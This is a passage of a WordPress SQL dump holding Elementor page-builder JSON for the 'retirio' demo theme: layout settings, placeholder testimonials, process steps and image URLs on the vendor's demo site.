delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3207,4765,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(3208,4765,'_elementor_pro_version','3.8.1'),(3209,4766,'_wp_page_template','elementor_header_footer'),(3210,4766,'_elementor_edit_mode','builder'),(3211,4766,'_elementor_template_type','wp-page'),(3212,4766,'_elementor_version','3.8.1');
INSERT INTO `wpev_postmeta` VALUES (3213,4766,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom 